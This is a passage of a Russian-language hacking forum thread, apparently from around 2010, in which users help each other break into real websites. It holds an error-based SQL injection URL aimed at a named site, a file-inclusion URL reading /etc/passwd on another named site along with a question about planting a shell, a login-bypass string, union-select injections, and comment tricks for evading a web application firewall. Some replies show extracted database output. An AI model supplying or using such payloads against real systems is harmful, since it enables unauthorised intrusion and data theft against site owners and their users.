Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
  2. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    http://www.staysafe.ca/index.php?action=showcats&category=1+and%20%28select%201%20from%20%28select%20count%280%29,concat%28version%28%29,floor%28rand%280%29*2%29%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%202%29a%29--+
     
    #12482 Strilo4ka, 22 Apr 2010
    Last edited: 23 Apr 2010
  3. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    интересна...
    вот мне интересна floor() rand() где про них можно почитать всегда на них сталкиваюсь иль по другому еще можно сделать запрос? и как называется эта инъекция (в смысле фильтрация иль что???)
     
  4. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    сюда http://forum.antichat.ru/thread119047-blind.html
     
  5. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    спасиб
     
  6. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    личку смотри
     
  7. AKYLA

    AKYLA Elder - Старейшина

    Joined:
    29 Nov 2007
    Messages:
    108
    Likes Received:
    35
    Reputations:
    6
    Есть вот такая скуль:
    Но что-то никак не выходит раскрутить, подскажите гуру как тут можно сформировать строку правильно?
     
  8. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    123456 union select 1 --
     
  9. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    как добавить фрейм на странички сделанные в асп?
     
  10. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    <IFRAME id="frame1" src="http://forum.antichat.ru" runat="server">
     
    1 person likes this.
  11. stasiliy

    stasiliy New Member

    Joined:
    26 Sep 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    Подскажите.. разбираюсь щас с пхп-инъекц..
    нашел сайт, там присутствует локальный инклюд, внешнего нету, что я могу зделать???
    могу ли чтото добыть интересное или залить шелл какимто образом??
    сайт: http://www.sidi-kaouki.com/new/index.php?f=../../../../../../../etc/passwd
     
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    попробуй найти путь к скриптам и инклудить скрипты
     
    _________________________
  13. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    login admin' or 1=1/*
    пасс любой.
     
    #12493 Strilo4ka, 23 Apr 2010
    Last edited: 24 Apr 2010
    1 person likes this.
  14. stasiliy

    stasiliy New Member

    Joined:
    26 Sep 2009
    Messages:
    27
    Likes Received:
    2
    Reputations:
    1
    крута))) спс
     
    1 person likes this.
  15. AKYLA

    AKYLA Elder - Старейшина

    Joined:
    29 Nov 2007
    Messages:
    108
    Likes Received:
    35
    Reputations:
    6
    Ctacok
    Это мне было адресовано? это в смысле там одна колонка будет? просто как не составлял запрос, ничего не выходит, подобрать колонки не удается :(
    Чтоб было понятнее:
    Уязвимость по идее в sex.
     
    1 person likes this.
  16. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Тогда так
    Duplicate entry 'inlove241' for key 1
    database=inlove24
     
    1 person likes this.
  17. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    как можно обойти фильтрацию на select?? замучался уже стоит WAF
     
  18. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    может быть чето вроде +union+/*!select*/+1 а может и нет, вообще бессмыслено что то думать без ссылки.
    --------------------
    заливал кто шел через webasyst ? какие методы есть ?
     
    #12498 warlok, 24 Apr 2010
    Last edited: 24 Apr 2010
    2 people like this.
  19. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    редиректит на гугль
    пробовал
    /* */
    /*! */
    /*!12345 */
    не катит....
     
  20. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292

    ('...'+'...') так?
     
    1 person likes this.
Thread Status:
Not open for further replies.